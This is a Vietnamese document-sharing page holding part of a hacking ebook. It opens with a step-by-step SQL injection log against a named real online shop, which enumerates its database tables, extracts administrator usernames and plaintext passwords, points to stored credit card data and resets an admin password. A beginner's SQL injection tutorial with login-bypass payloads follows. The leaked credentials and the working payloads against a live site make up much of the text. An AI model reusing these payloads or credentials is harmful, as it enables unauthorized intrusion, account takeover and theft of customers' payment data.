1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 229 pptx

6 101 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 121,07 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

downloads dtproperties gifts hackers languages mycompany oitems orders ordertracking pinnumbers prodcategories prodfeatures products projects quantitydiscounts registrant registryitems r

Trang 1

downloads

dtproperties

gifts

hackers

languages

mycompany

oitems

orders

ordertracking

pinnumbers

prodcategories

prodfeatures

products

projects

quantitydiscounts

registrant

registryitems

reviews

savedcarts

searchresults

shipmethods

suppliers

tblaccess

tbllog

tbluser

templates

Code:

https://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54 and

1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tblaccess')and column_name not in (' '))) sp_password

Dò các collumn trong table

https://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54%20and%201=c

on vert(int,(select%20top%201%20column_name%20from%20

information_schema.columns%20where%20table_name=('

Trang 2

configuration')and%20column_name%20not%20in%20('fl

dauto','fldusername','fldpassword','id','fieldname

','fieldvalue','fieldgroup','fieldyesno'))) sp_password

https://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54%20and%201=c

on vert(int,(select%20top%201%20column_name%20from%20

information_schema.columns%20where%20table_name=('

tbluser')and%20column_name%20not%20in%20('fldacces

s','fldauto','fldusername','fldpassword','flddatab

ase','tablesallowed','admintype','uploaddirectory' ,'adminother1'))) sp_password

Ra đc các column lần lượt, nên chú ý vào : oders chứa CC, tbluser có user, pass admin, configuration chứa link admin

https://shop.leadtools.com/shopdispl p?catalogID=54 and 1=convert(int,(select top 1 fldusername+fldpassword from tbluser)) sp_password

https://shop.leadtools.com/shopdispl p?catalogID=54 and 1=convert(int,(select fldpassword from tbluser where fldusername='gabriel')) sp_password

tblaccess:

https://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54%20and%201=c

on vert(int,(select%20top%201%20column_name%20from%20

information_schema.columns%20where%20table_name=('

tblaccess')and%20column_name%20not%20in%20('fldaut

o','fldname','fldurl','fldcomment','flddatabase')) ) sp_password

https://shop.leadtools.com/shopdispl p?catalogID=54 and 1=convert(int,(select top 1 fldurl from tblaccess)) sp_password

Ra đc user/pass admin như sau

gabriel/crack69

https://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54%20and%201=c

on vert(int,(select%20fldpassword%20from%20tbluser%20

where%20fldusername='gabriel')) sp_password

https://shop.leadtools.com/shopdispl gID=54%20union select 1 from

configuration sp_password

https://shop.leadtools.com/shopdispl ) sp_password

UPDATE 'configuration' SET 'fldpassword' = 'dch' WHERE

fldusername='gabriel'

Trang 3

https://shop.leadtools.com/shopdispl ) sp_password

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2

0,21,22,23,24,25,26,27,28,29,30,31,32,33,34' to a column of data type int

https://shop.leadtools.com/shopdispl p?catalogID=54 and 1=convert(int,(select fldusername from tbluser where fldpassword='rumi')) sp_password

-> 'rumi'

https://shop.leadtools.com/shopdispl p?catalogID=54 and 1=convert(int,(select fldusername from tbluser where fldpassword<>'rumi')) sp_password

rumi/rumi

marketing/marketing

freeman/dempfreeman

kelly/rumisucks

gregg/gregg

https://shop.leadtools.com/shopdisplayproducts.asp?catalogID=54%20and%201=c

on vert(int,(select%20top%201%20fldpassword%20from%20

tbluser%20where%20(admintype%3C%3E'SUPER'%20and%20

fldusername%3C%3E'gabriel'and%20fldpassword%3C%3E'

dempfreeman'%20and%20fldusername%3C%3E'rumi'%20and

%20fldusername='kelly'))) sp_password

Hik, thêm comment roài nhá

Dinhcaohack (vniss)

Tổng hợp về SQL Injection (bài 1)

Hi all , những người nghiên cứu hacking ở Việt Nam đã nói khá nhiều về kĩ thuật SQL Injection , Fantomas311 còn giữ một số bài viết hay và cơ bản về vấn đề này , post lên cho anh em tham khảo và cho những người đến sau có dịp tìm hiểu về một

kĩ thuật hack khá thông dụng trong web hacking

-

Trang 4

PHẦN 1:

SQL Injection là gì?

SQL Injection là một trong những kiểu hack web đang dần trở nên phổ biến hiện nay Bằng cách inject các mã SQL query/command vào input trước khi chuyển cho ứng dụng web xử lí, bạn có thể login mà không cần username và password, remote execution, dump data và lấy root của SQL server Công cụ dùng để tấn công là một trình duyệt web bất kì, chẳng hạn như Internet Explorer, Netscape, Lynx,

2) Tìm kiếm mục tiêu

Bạn có thể search các trang web cho phép submit data ở bất kì một search-engine nào trên mạng, chẳng hạn như các trang login, search, feedback,

http://vịtcon/index.asp?id=10

Một số trang web chuyển tham số qua các field ẩn, bạn phải xem mã HTML mới thấy rõ

<FORM action=Search/search.asp method=post>

<input type=hidden name=A value=C>

</FORM>

3) Kiểm tra chử yếu của trang web

Thử submit các field username, password hoặc field id, bằng hi' or 1=1

- Login: hi' or 1=1

- Pass: hi' or 1=1

- http://vịtcon/index.asp?id=hi' or 1=1

Nếu site chuyển tham số qua field ẩn, bạn hãy download source HTML, lưu trên đĩa cứng và thay đổi lại URL cho phù hợp Ví dụ:

<FORM action=http://vịtcon/Search/search.asp method=post>

Trang 5

<input type=hidden name=A value="hi' or 1=1 ">

</FORM>

Nếu thành công, bạn có thể login vào mà không cần phải biết username và

password

4) Tại sao ' or 1=1 có thể bypass login?

Giả sử như có một trang asp link đến một asp trang khác với URL như sau:

http://vịtcon/index.asp?category=food

Trong URL trên, biến 'category' được gán giá trị là 'food' Mã asp của trang này có thể như sau (đây chỉ là ví dụ thôi):

v_cat = request("category")

sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"

set rs=conn.execute(sqlstr)

v_cat sẽ chứa giá trị của biến request.category, 'food' và câu lệnh SQL tiếp theo sẽ là:

SELECT * FROM product WHERE PCategory='food'

Dòng query trên sẽ trả về một tập resultset chứa một hoặc nhiều dòng phù hợp với điều kiện WHERE PCategory='food'

Nếu bạn thay đổi URL trên thành http://vịtcon/index.asp?category=food' or 1=1 , biến v_cat sẽ chứa giá trị "food' or 1=1 " và dòng lệnh SQL query sẽ là:

SELECT * FROM product WHERE PCategory='food' or 1=1 '

Dòng query trên sẽ select mọi thứ trong table product bất chấp PCategory có bằng 'food' hay không Hai dấu gạch ngang " " chỉ cho MS SQL server biết đã hết dòng query, mọi thứ còn lại sau " " sẽ bị bỏ qua Đối với MySQL, bạn hãy thay " "

Trang 6

thành "#"

Bạn cũng có thể thử cách khác bằng cách submit ' or 'a'='a Dòng SQL query bây giờ sẽ là:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

Một số data khác mà bạn cũng nên submit để biết xem trang web có gặp lửi hay không:

' or 1=1

Ngày đăng: 04/07/2014, 12:20